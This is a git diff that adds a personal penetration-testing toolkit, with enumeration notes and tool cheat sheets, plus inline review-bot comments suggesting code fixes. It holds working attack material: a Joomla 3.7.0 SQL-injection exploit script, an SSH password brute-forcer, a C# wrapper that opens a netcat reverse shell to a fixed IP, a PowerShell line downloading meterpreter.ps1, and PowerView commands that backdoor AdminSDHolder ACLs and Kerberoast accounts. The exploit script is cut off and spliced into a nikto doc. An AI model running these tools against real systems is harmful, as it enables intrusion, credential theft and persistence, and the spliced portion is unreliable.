diff --git a/PayloadsAllTheThings b/PayloadsAllTheThings
new file mode 160000
index 0000000..975a23a
--- /dev/null
+++ b/PayloadsAllTheThings
@@ -0,0 +1 @@
+Subproject commit 975a23ae3487a57c9919a8386cf1d1a2049aa631
diff --git a/PowerSploit b/PowerSploit
new file mode 160000
index 0000000..d943001
--- /dev/null
+++ b/PowerSploit
@@ -0,0 +1 @@
+Subproject commit d943001a7defb5e0d1657085a77a0e78609be58f
diff --git a/active_directory/powerview.ps1 b/active_directory/powerview.ps1
new file mode 100644
index 0000000..1bf751a
--- /dev/null
+++ b/active_directory/powerview.ps1
@@ -0,0 +1,207 @@ +# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ +# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c + +# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: +# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 + +# New function naming schema: +# Verbs: +# Get : retrieve full raw data sets +# Find : ‘find’ specific data entries in a data set +# Add : add a new object to a destination +# Set : modify a given object +# Invoke : lazy catch-all +# Nouns: +# Verb-Domain* : indicates that LDAP/.NET querying methods are being executed +# Verb-WMI* : indicates that WMI is being used under the hood to execute enumeration +# Verb-Net* : indicates that Win32 API access is being used under the hood + + +# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups +Get-DomainGroup -MemberIdentity + +# get all the effective members of a group, 'recursing down' +Get-DomainGroupMember -Identity "Domain Admins" -Recurse + +# use an alterate creadential for any function +$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' 
-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUser -Credential $Cred + +# retrieve all the computer dns host names a GPP password applies to +Get-DomainOU -GPLink '' | % {Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname} + +# get all users with passwords changed > 1 year ago, returning sam account names and password last set times +$Date = (Get-Date).AddYears(-1).ToFileTime() +Get-DomainUser -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset + +# all enabled users, returning distinguishednames +Get-DomainUser -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname +Get-DomainUser -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname + +# all disabled users +Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=2)" +Get-DomainUser -UACFilter ACCOUNTDISABLE + +# all users that require smart card authentication +Get-DomainUser -LDAPFilter "(useraccountcontrol:1.2.840.113556.1.4.803:=262144)" +Get-DomainUser -UACFilter SMARTCARD_REQUIRED + +# all users that *don't* require smart card authentication, only returning sam account names +Get-DomainUser -LDAPFilter "(!useraccountcontrol:1.2.840.113556.1.4.803:=262144)" -Properties samaccountname +Get-DomainUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname + +# use multiple identity types for any *-Domain* function +'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff + +# find all users with an SPN set (likely service accounts) +Get-DomainUser -SPN + +# check for users who don't have kerberos preauthentication set +Get-DomainUser -PreauthNotRequired +Get-DomainUser -UACFilter DONT_REQ_PREAUTH + +# find all service accounts in "Domain Admins" +Get-DomainUser -SPN | ?{$_.memberof -match 
'Domain Admins'} + +# find users with sidHistory set +Get-DomainUser -LDAPFilter '(sidHistory=*)' + +# find any users/computers with constrained delegation st +Get-DomainUser -TrustedToAuth +Get-DomainComputer -TrustedToAuth + +# enumerate all servers that allow unconstrained delegation, and all privileged users that aren't marked as sensitive/not for delegation +$Computers = Get-DomainComputer -Unconstrained +$Users = Get-DomainUser -AllowDelegation -AdminCount + +# return the local *groups* of a remote server +Get-NetLocalGroup SERVER.domain.local + +# return the local group *members* of a remote server using Win32 API methods (faster but less info) +Get-NetLocalGroupMember -Method API -ComputerName SERVER.domain.local + +# Kerberoast any users in a particular OU with SPNs set +Invoke-Kerberoast -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" + +# Find-DomainUserLocation == old Invoke-UserHunter +# enumerate servers that allow unconstrained Kerberos delegation and show all users logged in +Find-DomainUserLocation -ComputerUnconstrained -ShowAll + +# hunt for admin users that allow delegation, logged into servers that allow unconstrained delegation +Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation + +# find all computers in a given OU +Get-DomainComputer -SearchBase "ldap://OU=..." 
+ +# Get the logged on users for all machines in any *server* OU in a particular domain +Get-DomainOU -Identity *server* -Domain | %{Get-DomainComputer -SearchBase $_.distinguishedname -Properties dnshostname | %{Get-NetLoggedOn -ComputerName $_}} + +# enumerate all gobal catalogs in the forest +Get-ForestGlobalCatalog + +# turn a list of computer short names to FQDNs, using a global catalog +gc computers.txt | % {Get-DomainComputer -SearchBase "GC://GLOBAL.CATALOG" -LDAP "(name=$_)" -Properties dnshostname} + +# enumerate the current domain controller policy +$DCPolicy = Get-DomainPolicy -Policy DC +$DCPolicy.PrivilegeRights # user privilege rights on the dc... + +# enumerate the current domain policy +$DomainPolicy = Get-DomainPolicy -Policy Domain +$DomainPolicy.KerberosPolicy # useful for golden tickets ;) +$DomainPolicy.SystemAccess # password age/etc. + +# enumerate what machines that a particular user/group identity has local admin rights to +# Get-DomainGPOUserLocalGroupMapping == old Find-GPOLocation +Get-DomainGPOUserLocalGroupMapping -Identity + +# enumerate what machines that a given user in the specified domain has RDP access rights to +Get-DomainGPOUserLocalGroupMapping -Identity -Domain -LocalGroup RDP + +# export a csv of all GPO mappings +Get-DomainGPOUserLocalGroupMapping | %{$_.computers = $_.computers -join ", "; $_} | Export-CSV -NoTypeInformation gpo_map.csv + +# use alternate credentials for searching for files on the domain +# Find-InterestingDomainShareFile == old Invoke-FileFinder +$Password = "PASSWORD" | ConvertTo-SecureString -AsPlainText -Force +$Credential = New-Object System.Management.Automation.PSCredential("DOMAIN\user",$Password) +Find-InterestingDomainShareFile -Domain DOMAIN -Credential $Credential + +# enumerate who has rights to the 'matt' user in 'testlab.local', resolving rights GUIDs to names +Get-DomainObjectAcl -Identity matt -ResolveGUIDs -Domain testlab.local + +# grant user 'will' the rights to change 'matt's password 
+Add-DomainObjectAcl -TargetIdentity matt -PrincipalIdentity will -Rights ResetPassword -Verbose + +# audit the permissions of AdminSDHolder, resolving GUIDs +Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs + +# backdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse +Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All + +# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) +Get-DomainObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? { + ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') +} + +# find linked DA accounts using name correlation +Get-DomainGroupMember 'Domain Admins' | %{Get-DomainUser $_.membername -LDAPFilter '(displayname=*)'} | %{$a=$_.displayname.split(' ')[0..1] -join ' '; Get-DomainUser -LDAPFilter "(displayname=*$a*)" -Properties displayname,samaccountname} + +# save a PowerView object to disk for later usage +Get-DomainUser | Export-Clixml user.xml +$Users = Import-Clixml user.xml + +# Find any machine accounts in privileged groups +Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} + +# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights +Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? 
{ ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')} + +# find all policies applied to a current machine +Get-DomainGPO -ComputerIdentity windows1.testlab.local + +# enumerate all groups in a domain that don't have a global scope, returning just group names +Get-DomainGroup -GroupScope NotGlobal -Properties name + +# enumerate all foreign users in the global catalog, and query the specified domain localgroups for their memberships +# query the global catalog for foreign security principals with domain-based SIDs, and extract out all distinguishednames +$ForeignUsers = Get-DomainObject -Properties objectsid,distinguishedname -SearchBase "GC://testlab.local" -LDAPFilter '(objectclass=foreignSecurityPrincipal)' | ? {$_.objectsid -match '^S-1-5-.*-[1-9]\d{2,}$'} | Select-Object -ExpandProperty distinguishedname +$Domains = @{} +$ForeignMemberships = ForEach($ForeignUser in $ForeignUsers) { + # extract the domain the foreign user was added to + $ForeignUserDomain = $ForeignUser.SubString($ForeignUser.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' + # check if we've already enumerated this domain + if (-not $Domains[$ForeignUserDomain]) { + $Domains[$ForeignUserDomain] = $True + # enumerate all domain local groups from the given domain that have membership set with our foreignSecurityPrincipal set + $Filter = "(|(member=" + $($ForeignUsers -join ")(member=") + "))" + Get-DomainGroup -Domain $ForeignUserDomain -Scope DomainLocal -LDAPFilter $Filter -Properties distinguishedname,member + } +} +$ForeignMemberships | fl + +# if running in -sta mode, impersonate another credential a la "runas /netonly" +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Invoke-UserImpersonation -Credential $Cred +# ... 
action +Invoke-RevertToSelf + +# enumerates computers in the current domain with 'outlier' properties, i.e. properties not set from the firest result returned by Get-DomainComputer +Get-DomainComputer -FindOne | Find-DomainObjectPropertyOutlier + +# set the specified property for the given user identity +Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose + +# Set the owner of 'dfm' in the current domain to 'harmj0y' +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y + +# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync) +Get-ObjectACL "DC=testlab,DC=local" -ResolveGUIDs | ? { + ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get') +} + +# check if any user passwords are set +$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl + diff --git a/antivirus_evasion.md b/antivirus_evasion.md new file mode 100644 index 0000000..fe7a10a --- /dev/null +++ b/antivirus_evasion.md @@ -0,0 +1,17 @@ +# Antivirus Evasion + +* Existing types + * On-Disk evasion + * In-Memory evasion + +* Detection Methods + * Static Detection -- Hash or String/Byte Matching + * Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox + + +## Links +* [cmnatic](https://cmnatic.co.uk/) +* [cmnatic's diss](https://resources.cmnatic.co.uk/Presentations/Dissertation/) + + + diff --git a/enumeration/Checklists b/enumeration/Checklists new file mode 160000 index 0000000..5fc1c93 --- /dev/null +++ b/enumeration/Checklists @@ -0,0 +1 @@ +Subproject commit 5fc1c93767878028c0f8c74de37cb9dee1659f60 
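Review bot: The file is committed as a `.ps1` but it is a cheat sheet rather than a runnable script: several lines are incomplete (`Get-DomainGroup -MemberIdentity`, `Get-DomainOU -Identity *server* -Domain`, `Get-DomainGPOUserLocalGroupMapping -Identity`) and others embed sample credentials ('BurgerBurgerBurger!', 'Password123!', "PASSWORD"), so dot-sourcing it would error out or act against a live directory. Saving it as `powerview.md`, or commenting the command lines out and keeping the prose, would make the intent explicit and prevent accidental execution. The two "retrieve *most* users who can perform DC replication" entries duplicate each other, and the second uses the legacy `Get-ObjectACL` name that the header's "New function naming schema" section says was replaced by the `Verb-Domain*` form; keeping only the `Get-DomainObjectAcl` variant would match the file's own notes. Comment typos worth fixing while here: "alterate creadential", "gobal", "firest", and the truncated "constrained delegation st".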
diff --git a/enumeration/PSTools.zip b/enumeration/PSTools.zip
new file mode 100644
index 0000000..67e87c7
Binary files /dev/null and b/enumeration/PSTools.zip differ
diff --git a/enumeration/docs/gobuster.md b/enumeration/docs/gobuster.md
new file mode 100644
index 0000000..23631ac
--- /dev/null
+++ b/enumeration/docs/gobuster.md
@@ -0,0 +1,48 @@
+# Gobuster
+
+[Repo](https://github.com/OJ/gobuster.git)
+
+### Directories
+```sh
+gobuster dir -u -w
+```
+
+### DNS
+```sh
+gobuster dns -d -w --show-cname --show-ips --resolver
+```
+
+### Vhosts
+* Find other Domains on a host via `seclists/Discovery/DNS/subdomains-top1million-5000.txt`
+```sh
+gobuster vhost -u -w
+```
+
+
+### FileExtension
+```sh
+-x
+```
+* Fuzz for files and file extensions
+```sh
+gobuster dir -u -w /usr/share/seclists/Discovery/raft-small-word-lowercase.txt -x .conf,.js
+```
+
+### Basic Auth
+```sh
+gobuster help dir
+```
+* `--username` and `--password`
+
+* `dir -s` Accept HTTP Status
+* `dir -k` Skip TLS Auth
+* `dir -a` User Agent
+
+### Wordlists
+```sh
+/usr/share/seclists/Discovery/Web-Content/common.txt
+/usr/share/seclists/Discovery/Web-Content/big.txt
+/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
+/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
+/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
+```
diff --git a/enumeration/docs/nmap.md b/enumeration/docs/nmap.md
new file mode 100644
index 0000000..b15bdbc
--- /dev/null
+++ b/enumeration/docs/nmap.md
@@ -0,0 +1,17 @@
+# nmap
+
+# Usage
+
+```sh
+nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit
+```
+```sh
+nmap -oA nmap-vuln -Pn -script vuln -p
+```
+
+## combo with searchsploit
+* nmap-full scan
+```sh
+sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit
+searchsploit --nmap ./nmap-full.xml --verbose
+```
diff --git a/enumeration/docs/wpscan.md b/enumeration/docs/wpscan.md
new file mode 100644
index 0000000..16ebfd0
--- /dev/null
+++ b/enumeration/docs/wpscan.md
@@ -0,0 +1,35 @@
+# WPScan
+
+## Themes
+```sh
+wpscan --url --enumerate t
+```
+
+* `ls` for content
+
+## Plugins
+```sh
+wpscan --url --enumerate p
+```
+
+## Users
+```sh
+wpscan --url --enumerate u
+```
+
+## Vulnerabilities
+* WPVulnDB API is needed
+* Plugins
+```sh
+wpscan --url --enumerate vp
+```
+
+## Password attack
+```sh
+wpscan --url --passwords --usernames
+```
+
+## WAF Aggressiveness
+```sh
+wpscan --url --enumerate p --plugins-detection
+
diff --git a/enumeration/gobuster b/enumeration/gobuster
new file mode 160000
index 0000000..f7bc132
--- /dev/null
+++ b/enumeration/gobuster
@@ -0,0 +1 @@
+Subproject commit f7bc13252b4da5d13b2e9d93295da28a1f612125
diff --git a/enumeration/joomblah.py b/enumeration/joomblah.py
new file mode 100755
index 0000000..b6793e6
--- /dev/null
+++ b/enumeration/joomblah.py
@@ -0,0 +1,186 @@ +#!/usr/bin/python3 +import requests +import sys +import re +import argparse +import os +import random +import time +import binascii + + +def extract_token(resp): + match = re.search(r'name="([a-f0-9]{32})" value="1"', resp.text, re.S) + if match is None: + print(" [!] Cannot find CSRF token") + return None + return match.group(1) + + +def parse_options(): + parser = argparse.ArgumentParser(description='Jooma Exploit') + parser.add_argument('url', help='Base URL for Joomla site') + return parser.parse_args() + + +def build_sqli(colname, morequery): + return "(SELECT " + colname + " " + morequery + ")" + +def joomla_370_sqli_extract(options, sess, token, colname, morequery): + sqli = build_sqli("LENGTH("+colname+")", morequery) + length = joomla_370_sqli(options, sess, token, sqli) + if not length: + return None + length = int(length) + maxbytes = 30 + offset = 0 + result = '' + while length > offset: + sqli = build_sqli("HEX(MID(%s,%d,%d))" % (colname, offset + 1, 16), morequery) + value = joomla_370_sqli(options, sess, token, sqli) + if not value: + print(" [!] Failed to retrieve string for query:", sqli) + return None + value = binascii.unhexlify(value) + result += value + offset += len(value) + return result + + +def joomla_370_sqli(options, sess, token, sqli): + sqli_full = "UpdateXML(2, concat(0x3a," + sqli + ", 0x3a), 1)" + data = { + 'option': 'com_fields', + 'view': 'fields', + 'layout': 'modal', + 'list[fullordering]': sqli_full, + token: '1', + } + resp = sess.get(options.url + "/index.php?option=com_fields&view=fields&layout=modal", params=data, allow_redirects=False) + match = re.search(r'XPATH syntax error:\s*'([^$\n]+)\s*'\s*: -h http://example.com:1234/manager/html +``` +## Plugins +```sh +nikto -h http://example.com -Plugins apacheusers +``` + +* List all plugins +```sh +nikto -list-plugins +``` + + diff --git a/enumeration/nmap-full.gnmap b/enumeration/nmap-full.gnmap new file mode 100644 index 0000000..c7edec2 --- /dev/null 
+++ b/enumeration/nmap-full.gnmap @@ -0,0 +1,4 @@ +# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247 +Host: 10.10.156.247 () Status: Up +Host: 10.10.156.247 () Ports: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///, 31337/open/tcp//Elite///, 49152/open/tcp//unknown///, 49153/open/tcp//unknown///, 49154/open/tcp//unknown///, 49155/open/tcp//unknown///, 49161/open/tcp//unknown///, 49162/open/tcp///// +# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds diff --git a/enumeration/nmap-full.nmap b/enumeration/nmap-full.nmap new file mode 100644 index 0000000..7ffc626 --- /dev/null +++ b/enumeration/nmap-full.nmap @@ -0,0 +1,19 @@ +# Nmap 7.91 scan initiated Wed Aug 11 19:58:19 2021 as: nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.156.247 +Nmap scan report for 10.10.156.247 +Host is up (0.064s latency). +Not shown: 64293 closed ports, 1231 filtered ports +Some closed ports may be reported as filtered due to --defeat-rst-ratelimit +PORT STATE SERVICE +135/tcp open msrpc +139/tcp open netbios-ssn +445/tcp open microsoft-ds +3389/tcp open ms-wbt-server +31337/tcp open Elite +49152/tcp open unknown +49153/tcp open unknown +49154/tcp open unknown +49155/tcp open unknown +49161/tcp open unknown +49162/tcp open unknown + +# Nmap done at Wed Aug 11 19:58:43 2021 -- 1 IP address (1 host up) scanned in 23.92 seconds diff --git a/enumeration/nmap-full.xml b/enumeration/nmap-full.xml new file mode 100644 index 0000000..40c82ff --- /dev/null +++ b/enumeration/nmap-full.xml @@ -0,0 +1,35 @@ + + + + + + + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/enumeration/shodan.md b/enumeration/shodan.md new file mode 100644 index 0000000..22e3dfb --- /dev/null +++ b/enumeration/shodan.md @@ -0,0 +1,31 @@ +# Shodan + +## Checking found Autonomous System Number (ASN) +* Shodan does output ASN, not necessarily the IP of a small company. Search for +```h +asn:AS13335 +``` +* [ASN Check](https://dnschecker.org/asn-whois-lookup.php) + +## Banner +* Example +```json +{ + "data": "Moxa Nport Device", + "Status": "Authentication disabled", + "Name": "NP5232I_4728", + "MAC": "00:90:e8:47:10:2d", + "ip_str": "46.252.132.235", + "port": 4800, + "org": "Starhub Mobile", + "location": { + "country_code": "SG" + } + } +``` + +## Filter +* vulns +```sh +vuln:ms17-010 +``` diff --git a/enumeration/ssh_brute_force.py b/enumeration/ssh_brute_force.py new file mode 100755 index 0000000..7971fd3 --- /dev/null +++ b/enumeration/ssh_brute_force.py @@ -0,0 +1,38 @@ +#!/usr/bin/env python + +import paramiko +import sys +import os + +target = str(input("IP address: ")) +username = str(input("Username: ")) +password_file = str(input("Location of password file: ")) + +def ssh_connect(password, code=0): + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + + try: + ssh.connect(target, port=22, username=username, password=password) + except paramiko.AuthenticationException: + code = 1 + ssh.close() + return code + +with open(password_file, 'rb') as _f: + for line in _f.readlines(): + password = line.strip() + print(password) + try: + response = ssh_connect(password) + + if response == 0 : + print("[+] Password Found: " + password.decode()) + exit(0) + if response == 1: + print("[-] Nothing Found") + except Exception as e: + print(e) + pass + + diff --git a/enumeration/windows/Windows-Exploit-Suggester-python3 b/enumeration/windows/Windows-Exploit-Suggester-python3 new file mode 160000 index 0000000..3670e5d --- /dev/null 
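Review bot: The shebang `#!/usr/bin/env python` can resolve to Python 2 on many hosts, where the three `input()` calls evaluate whatever is typed as a Python expression; the rest of the script already assumes Python 3 (`password.decode()` on the bytes read from the file), so it should read `#!/usr/bin/env python3`. In `ssh_connect`, `ssh.close()` is reached only when `connect` succeeds or raises `paramiko.AuthenticationException`, so any other exception leaves the client open; wrapping the connect in `try`/`finally` (or using the client as a context manager) would release it on every path. `sys` and `os` are imported but never used, and `exit(0)` should be `sys.exit(0)` if `sys` is kept.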
+++ b/enumeration/windows/Windows-Exploit-Suggester-python3
@@ -0,0 +1 @@
+Subproject commit 3670e5da50b6230166d023c85d9807f8fc1b8e3a
diff --git a/enumeration/windows/Wrapper.cs b/enumeration/windows/Wrapper.cs
new file mode 100644
index 0000000..72f78a3
--- /dev/null
+++ b/enumeration/windows/Wrapper.cs
@@ -0,0 +1,13 @@
+using System;
+using System.Diagnostics;
+
+namespace Wrapper {
+ class Program {
+ static void Main (){
+ Process proc = new Process();
+ ProcessStartInfo procInfo = new ProcessStartInfo("c:\\windows\\temp\\nc-mukaa.exe", "10.50.184.49 4447 -e cmd.exe");
+ proc.StartInfo = procInfo;
+ proc.Start();
+ }
+ }
+}
diff --git a/enumeration/windows/event_log.md b/enumeration/windows/event_log.md
new file mode 100644
index 0000000..0a84d0d
--- /dev/null
+++ b/enumeration/windows/event_log.md
@@ -0,0 +1,93 @@ +# Logging +* [Windows Logging CheatSheet](https://static1.squarespace.com/static/552092d5e4b0661088167e5c/t/580595db9f745688bc7477f6/1476761074992/Windows+Logging+Cheat+Sheet_ver_Oct_2016.pdf) +* [NSA -- Spotting Adversary with Windows Event Monitoring](https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm) +* [Events to Monitor](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor) +* [Windows 10 Monitoring Reference](https://www.microsoft.com/en-us/download/confirmation.aspx?id=52630) + +## Loglevel +|ID|Event Type|Description| +|--|----------|-----------| +|0|Error|An event that indicates a significant problem.| +|1|Warning|An event that is not necessarily significant.| +|2|Information|An event describing the successful operation of an application.| +|3|Success Audit|An event that records an audited security access attempt that is successful.| +|4|Failure Audit|An event that records an audited security access attempt that is failure.| + +## Logrotation +```sh +C:\Windows\System32\winevt\Logs +``` +* As an example, paths can be found under `Microsoft > Windows > PowerShell > Operational` and right click `Properties` in Event Viewer. Logs can be cleared as well in properties. + + +## Tools + +* Event Viewer (GUI-based application) +* Wevtutil.exe (command-line tool) +* Get-WinEvent (PowerShell cmdlet) + +### wevtutil.exe +```sh +wevtutil.exe /? 
+``` +* Count logs +```sh +wevtutil.exe le | measure +``` +* Read three most recent Application logs +```sh +wevtutil qe Application /c:3 /rd:true /f:text +``` + +### Get-WinEvent +* [Online help](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/Get-WinEvent?view=powershell-7.1) +* List all the logs +```sh +Get-WinEvent -ListLog * +``` +* Find string +```sh + Get-WinEvent -Path .\merged.evtx | Where-Object { $_.Message -like '*log clear*' } +``` +* Further filtering +```sh +Get-WinEvent -LogName Application | Where-Object { $_.ProviderName -Match 'WLMS' } +``` +```sh +Get-WinEvent -ListProvider *Policy* +``` +```sh +(Get-WinEvent -ListProvider Microsoft-Windows-GroupPolicy).Events | Format-Table Id, Description +``` +* Filter by hashtable values +```sh +Get-WinEvent -FilterHashtable @{ LogName='Application'; ProviderName='MsiInstaller' }; +``` +```sh +Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString' +``` +* Including __XPATH__ +```sh +Get-WinEvent -LogName Application -FilterXPath '*/System/EventID=101 and */System/Provider[@Name="WLMS"]' +``` +```sh +Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="System"' +``` +```sh + Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]' -MaxEvents 1 +``` +* Find login by username +```sh +Get-WinEvent -LogName Security -FilterXPath '*/System/EventID=4720 and */EventData/Data[@Name="TargetUserName"]="sam"' +``` + +### Command Line Logging +* Enable PS Logging +```sh +Local Computer Policy > Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell +``` +* CLI Process Auditing -- ID 4688 +``` +Local Computer Policy > Computer Configuration > Administrative Templates > System > Audit Process Creation +``` + 
diff --git a/enumeration/windows/manual_enum.md b/enumeration/windows/manual_enum.md
new file mode 100644
index 0000000..9be1d87
--- /dev/null
+++ b/enumeration/windows/manual_enum.md
@@ -0,0 +1,18 @@
+# Manual Windows Enumeration
+
+* `whoami /priv`
+* `whoami /groups`
+* Looking for non-default services:
+```sh
+wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows"
+```
+ * **Unquoted Service Path** Ideally there is a path without quotation
+ * Check which account the service the services run as
+ ```sh
+ sc qc
+ ```
+* Check if directory is writeable
+```sh
+powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
+```
+
diff --git a/enumeration/windows/powershell.md b/enumeration/windows/powershell.md
new file mode 100644
index 0000000..e801899
--- /dev/null
+++ b/enumeration/windows/powershell.md
@@ -0,0 +1,238 @@ +# Powershell Usage + +## Get-Help +``` +Get-Help Command-Name +``` +* Show examples +``` +Get-Help Command-Name -Examples +``` + +* Get-Command gets all the cmdlets installed on the current Computer. +``` +Get-Command +``` +``` +Get-Command Verb-* +Get-Command Invoke-* +Get-Command Get-* +``` + +## Passing Output via Pipe +* A pipe passes object including methods and attributes. + +``` +Verb-Noun | Get-Member +``` +``` +Get-Command | Get-Member -MemberType Method +``` + +## Creating Objects from Previous Cmdlets +``` +Get-ChildItem | Select-Object -Property Mode, Name +``` +* first - gets the first x object +* last - gets the last x object +* unique - shows the unique objects +* skip - skips x objects + +## Filtering Objects +``` +Verb-Noun | Where-Object -Property PropertyName -operator Value +Verb-Noun | Where-Object {$_.PropertyName -operator Value} +``` +The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet. +* Where -operator is a list of the following operators: + +* -Contains: if any item in the property value is an exact match for the specified value +* -EQ: if the property value is the same as the specified value +* -GT: if the property value is greater than the specified value + +## Sort Object +``` +Verb-Noun | Sort-Object +``` +``` +Get-ChildItem | Sort-Object +``` + +## Finding a File +``` +Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'} +``` +```sh +Get-HotFix | Format-list | findstr +``` + +## Showing File Content +``` +Get-Content 'C:\Program Files\interesting-file.txt' +``` + +## Copy File Content +```sh +Copy-Item +``` + +## Count Lines of Output +As an example, count all cmdlets on the system +``` +Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object +``` + +## Checksum of File +``` +Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt' +``` + +## Current Working 
Directory +``` +Get-Location +``` + +## File Metadata +```sh +ls | Format-List * +``` + +## Web Request +```sh +Invoke-Webrequest -Uri 'http:// -OutFile +``` +```sh +(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1') +``` + +## Base64 Decode File +``` +[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt))) +``` + +## **Circumvent Execution-Policy** +```sh +powershell -ExecutionPolicy Bypass -File .\ +``` +```sh +Set-ExecutionPolicy Bypass -Scope Process +``` + +## Enumeration + +### Users +``` +Get-LocalUser +``` + +* Password not required users +``` +Get-LocalUser | Where-Object -Property PasswordRequired -Match false +``` + +* SID of users +``` +Get-WmiObject win32_useraccount | Select name, sid +``` + +### Network intel +* IP Address +``` +Get-NetIpAddress +``` + +* Listening TCP Ports +``` +Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure +``` + +* TCP Port by number +``` +Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443 +``` + +### Patch level and updates +``` +Get-Hotfix +``` +* Find patch by HotFixID +``` +Get-Hotfix | Where-Object -Property HotFixID -Match KB124284 +``` + +### Find files and Content +* Find backup files +``` +Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue +``` + +* Find file contents +``` +Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY +``` + +### Processes +* Start processes +```sh +Start-Process +``` + +* Running processes +```sh +Get-Process +``` +* Scheduled Tasks, by TaskName +``` +Get-ScheduledTask | Where-Object -Property TaskName -Match taskname +``` +or +``` +Get-ScheduledTask -TaskName taskname +``` + +### Export Output +* Export as CSV +```sh +Get-Process | Export-Csv +``` + +### ACL +* Owner of files +``` +Get-ACL C:\ +``` + +### Port Scanner +``` +for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i} +``` + +### 
